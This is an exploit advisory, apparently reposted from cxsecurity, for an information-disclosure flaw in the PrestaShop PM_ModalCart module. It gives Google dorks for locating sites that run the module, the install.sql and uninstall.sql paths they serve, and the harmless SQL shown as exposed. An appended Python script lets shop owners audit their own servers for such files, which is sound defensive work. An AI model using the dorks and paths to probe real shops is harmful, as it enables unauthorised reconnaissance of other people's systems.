PrestaShop PM_ModalCart Modules 1.6.1.4 Database Disclosure

2019.01.01
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-200

#################################################################################################

# Exploit Title : PrestaShop PM_ModalCart Modules 1.6.1.4 Database Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 01/01/2019
# Vendor Homepage : prestashop.com
# Software Download Link : addons.prestashop.com/ru/pop-up/2438-modal-cart-3.html
+ prestashop.com/forums/topic/102385-module-pm-cross-selling-on-cart-est-maintenant-compatible-avec-modalcart/
# Software Price : 40$
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.5.0.14 - 1.4.5.1 - 1.4.7.0 - 1.4.7.3 - 1.4.8.2 - 1.6.1.4±
# Exploit Risk : Medium
# Google Dorks : inurl:''/modules/pm_modalcart/''
intext:''©2018 Recettes & Cabas | Tous droits réservés''
intext:''Agence de communication - Une réalisation Communikey''
intext:''cron module by samdha.net''
intext:''© 2018 - Udviklet og Hosted af Netgiganten.dk''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
# PacketStormSecurity Exploit Reference Link : packetstormsecurity.com/files/150906/PrestaShop-PM_ModalCart-1.6.1.4-Database-Disclosure.html

#################################################################################################

# Exploit :

/modules/pm_modalcart/install.sql

/modules/pm_modalcart/uninstall.sql

#################################################################################################

# Example SQL Database Information Exposure =>

install.sql =>

INSERT INTO `PREFIX_hook` (`name`, `title`, `description`, `position`) VALUES ('MCAbove', 'Modalcart above', 'On modal, above the product added to cart', 1);
INSERT INTO `PREFIX_hook` (`name`, `title`, `description`, `position`) VALUES ('MCBelow', 'Modalcart below', 'On modal, below the product added to cart', 1);

uninstall.sql

DELETE FROM `PREFIX_hook` WHERE `name` = 'MCAbove';
DELETE FROM `PREFIX_hook` WHERE `name` = 'MCBelow';

#################################################################################################

# Example Vulnerable Sites =>

#################################################################################################

# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
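
For shop owners, a local audit for the exposure described above (added example, not part of the original advisory): it walks a PrestaShop document root and lists every .sql file under modules/ together with the URL path it maps to. The function names, the constructed sample docroot, the assumption that modules/ is served statically, and the PREFIX_ triage heuristic are all assumptions of this example.

```python
"""Audit a PrestaShop document root for .sql files reachable under /modules/.

Added example, not from the advisory. Assumes the web server serves the
modules/ tree statically, so every file found maps to a fetchable URL path.
"""
import os
import sys
import tempfile


def find_exposed_sql(docroot):
    """Return sorted (url_path, has_prefix_placeholder) for .sql files under modules/."""
    findings = []
    modules_dir = os.path.join(docroot, "modules")
    for dirpath, _dirs, files in os.walk(modules_dir):
        for name in files:
            if not name.lower().endswith(".sql"):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, docroot).replace(os.sep, "/")
            with open(full, "r", encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            # Heuristic (assumption): install templates use the literal PREFIX_
            # placeholder, as in the advisory's sample; files without it may
            # carry real table names or data and deserve a closer look.
            findings.append(("/" + rel, "PREFIX_" in text))
    return sorted(findings)


def build_sample_docroot(base):
    """Create a constructed docroot mirroring the paths named in the advisory."""
    mod = os.path.join(base, "modules", "pm_modalcart")
    os.makedirs(mod)
    with open(os.path.join(mod, "install.sql"), "w", encoding="utf-8") as fh:
        fh.write("INSERT INTO `PREFIX_hook` (`name`) VALUES ('MCAbove');\n")
    with open(os.path.join(mod, "uninstall.sql"), "w", encoding="utf-8") as fh:
        fh.write("DELETE FROM `PREFIX_hook` WHERE `name` = 'MCAbove';\n")
    with open(os.path.join(mod, "pm_modalcart.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php // module code, ignored by the audit\n")
    return base


if __name__ == "__main__":
    # Audit the docroot given on the command line, or a constructed sample.
    with tempfile.TemporaryDirectory() as tmp:
        root = sys.argv[1] if len(sys.argv) > 1 else build_sample_docroot(tmp)
        for url_path, is_template in find_exposed_sql(root):
            kind = "install template" if is_template else "REVIEW: no PREFIX_ placeholder"
            print(f"{url_path}\t{kind}")
```

Run it with the shop's document root as the only argument; each reported path is one the web server will hand out unless the file is removed or a server rule denies .sql requests.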



Copyright 2019, cxsecurity.com

 
